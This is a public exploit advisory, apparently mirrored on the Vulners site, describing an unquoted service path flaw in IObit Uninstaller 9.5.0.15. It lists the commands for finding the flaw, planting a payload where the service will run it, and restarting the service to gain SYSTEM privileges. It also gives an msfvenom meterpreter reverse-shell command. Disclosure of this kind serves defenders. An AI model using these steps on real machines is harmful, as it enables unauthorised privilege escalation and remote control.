Vulners
Lucene search
IObit Uninstaller 9.5.0.15 Unquoted Service Path
`# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
# Author: Gobinathan L
# Date: 2020-06-03
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
# Version : 9.5.0.15
# Tested on: Windows 10 64bit(EN)
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes,
leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
Steps to recreate :
=============================
1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The Vulnerable Service would Show up.
3. Check the Service Permissions by typing [ sc qc IObitUnSvr ]
4. The command would return..
C:\>sc qc IObitUnSvr
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IObitUnSvr
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IObit Uninstaller Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine"
6. Now create a Payload with msfvenom or other tools and name it to IObit.exe
7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory.
8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory.
9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ]
10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege].
During my testing :
Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]
# Disclaimer :
=========================
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2020 00:00Current
0.2Low risk
Vulners AI Score0.2